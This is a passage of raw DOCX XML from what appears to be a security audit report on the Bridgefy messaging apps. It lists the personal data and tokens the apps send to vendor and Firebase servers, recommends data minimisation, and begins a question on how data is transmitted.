        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>servers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The phone number, verification code, platform, location, FCM token, displayName, nickName, avatar, prekeys, and Firebase access token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(user_id, phone number, name, etc.) are sent to the APP API server on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.app.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-031</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The phone number and password (derived</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to the Firebase service servers (</w:t>
      </w:r>
      <w:hyperlink r:id="rId278">
        <w:r>
          <w:rPr>
            <w:i/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>www.googleapis.com</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>refresh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tokens to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>securetoken.googleapis.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The mobile apps send the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>userId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(sender and receiver in the topic), Firebase access token (user_id, phone number, name, etc.), and direct messages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>senderFirebaseId, receiverFirebaseId, receiverNickname, receiverAvatar, receiverName, senderNickname, senderName, senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and encrypted messages) to the MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.broker.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Other less significant information gathered is that the mobile apps and SDK collect the mobile OS version, manufacturer and model. Then send that information as part of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>User-Agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>value in requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.sdk.bridgefy.services </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>staging.app.bridgefy.services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to reduce the amount of information gathered by the servers and apps to the minimum possible necessary for the solution to work. For additional information, please refer to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q06</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250011" w:id="44"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q03:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>How</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>transmits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team resolved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and 7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="435" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q3: Where and how are the files/information gathered transmitted? What information can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ISP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>see,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>scenario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/ internet shutdown?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
